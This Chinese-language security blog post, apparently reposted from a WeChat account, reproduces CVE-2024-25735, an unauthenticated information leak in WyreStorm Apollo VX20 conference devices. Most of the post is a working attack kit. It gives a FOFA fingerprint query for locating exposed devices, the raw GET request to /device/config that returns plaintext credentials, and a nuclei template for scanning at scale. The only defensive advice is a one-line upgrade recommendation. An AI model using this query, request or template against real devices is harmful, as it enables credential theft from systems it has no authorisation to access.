CVE-2024-25735漏洞复现(附POC)

admin 2024年3月6日08:34:24评论123 views字数 1147阅读3分49秒阅读模式

使

01

漏洞名称

WyreStorm Apollo VX20 信息泄露漏洞

02

漏洞影响

WyreStorm Apollo VX20 < 1.3.58

CVE-2024-25735漏洞复现(附POC)

03

漏洞描述

WyreStorm Apollo VX20是一款优质的音视频会议一体机,专为企业办公室和会议室空间设计。这款设备集成了摄像头、麦克风、扬声器及投屏功能,为企业办公和视频会议提供优质的视听体验。该系统存在信息泄露漏洞,未经授权的远程攻击者可以获取明文凭据。

04

FOFA搜索语句

icon_hash="-893957814"

CVE-2024-25735漏洞复现(附POC)

05

漏洞复现

该漏洞是get请求,可以直接使用浏览器访问

CVE-2024-25735漏洞复现(附POC)

完整POC数据包如下

GET /device/config HTTP/1.1Host: 192.168.40.130:115User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

CVE-2024-25735漏洞复现(附POC)

漏洞复现成功

06

nuclei poc

poc文件内容如下

id: CVE-2024-25735

info:  name: WyreStorm Apollo VX20 信息泄露漏洞  author: fgz  severity: high  description: |    WyreStorm Apollo VX20是一款优质的音视频会议一体机,专为企业办公室和会议室空间设计。这款设备集成了摄像头、麦克风、扬声器及投屏功能,为企业办公和视频会议提供优质的视听体验。该系统存在信息泄露漏洞,未经授权的远程攻击者可以获取明文凭据。  metadata:    verified: true    max-request: 1    vendor: WyreStorm    product: WyreStorm Apollo VX20    fofa-query: icon_hash="-893957814"  tags: cve,cve2024,aiohttp

http:  - method: GET    path:      - "{{BaseURL}}/device/config"

    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body,'password') && contains(body,'softAp')"

07

修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):CVE-2024-25735漏洞复现(附POC)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月6日08:34:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-25735漏洞复现(附POC)https://cn-sec.com/archives/2550451.html

发表评论

匿名网友 填写信息